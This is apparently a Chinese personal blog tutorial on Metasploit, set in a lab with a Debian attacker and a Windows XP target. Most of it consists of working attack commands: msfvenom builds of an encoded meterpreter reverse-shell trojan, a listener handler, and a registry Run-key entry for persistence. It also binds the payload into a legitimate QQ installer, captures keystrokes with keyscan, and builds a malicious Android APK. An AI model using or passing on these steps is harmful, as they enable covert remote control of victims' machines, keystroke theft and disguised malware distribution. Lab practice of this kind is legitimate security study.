[工具使用] Msf

实验环境

  • 攻击主机操作系统:Debian 11
  • 目标主机操作系统:Windows XP

msf简单使用

  1. 下载并安装msf(Metasploit Framework)

    # 获取msf的安装文件并且重命名为msfinstall
    curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall
    # 修改msfinstall的权限,使得root用户可执行
    chmod + 755 msfinstall
    # 安装msf
    sudo ./msfinstall
    
  2. 下载并安装ufw(Uncomplicated FireWall)

    sudo apt-get install ufw
    
  3. 使用ufw开放特定的端口

    # 在这里打开9999端口
    sudo ufw allow 9999
    
  4. 使用ip a命令查看本机的ipv4地址

    即:当前的ipv4地址为192.168.124.137

  5. 使用如下命令创建木马

    msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.124.137 LPORT=9999 -b "\x00" -e x86/shikata_ga_nai -f exe -o Virus.exe
    

  6. 分别执行以下命令来使用msf监听

    msfconsole # 进入msf配置
    use exploit/multi/handler
    set payload windows/meterpreter/reverse_tcp 
    set lhost 192.168.124.137
    set lport 9999
    exploit
    
  7. 使用show options查看当前的配置,然后使用exploit启动

  8. virus.exe放到Windows XP系统中并双击运行,msf可以查看到连接信息

设置开机启动

  使用命令修改注册表HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run项,为其添加一个名为virus的项,值为"C:\shadow\virus.exe"(这个是木马路径)。使用的命令如下(这个命令只有在本地有效,如果在Msf中使用会出现You must specify a key path (-k)的错误)

reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v virus /t REG_SZ /d "C:\shadow\virus.exe" /f

  通过msf重启Windows XP系统

# 这个命令似乎只能关机,不能重启,但是关机之后可以手动打开计算机
shutdown -r now

  可以看到目标主机启动的时候木马会自动启动,攻击主机同时能够监听到。

将木马绑定到应用程序中

msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.124.137 LPORT=9999 -b "\x00" -e x86/shikata_ga_nai -x /home/cain/qqsetup.exe -f exe -o /home/cain/qqsetupvirus.exe

  使用这种方式创建的程序可以放到目标主机中执行,同样可以在攻击主机中监听到,但是程序丧失了安装的功能。(暂时还没找到解决办法)

查看用户的所有键盘操作

sc-keylog也可以记录键盘等设备的记录

# 启动
keyscan_start
# 查看记录
keyscan_dump
# 关闭
keyscan_stop

Android下的入侵

  1. 创建木马

    msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.124.137 LPORT=9999 R > v.apk
    
  2. 进入监听

    msfconsole # 进入msf配置
    use exploit/multi/handler
    set payload Android/meterpreter/reverse_tcp 
    set lhost 192.168.124.137
    set lport 9999
    exploit
    
  3. 将生成的v.apk安装到Android系统中

    // 如果普通的安装方式失败,可以使用abd来安装
    adb install -r -t "path……/v.apk"
    

posted @ 2022-04-22 22:56  Cainoftes  阅读(468)  评论(0)    收藏  举报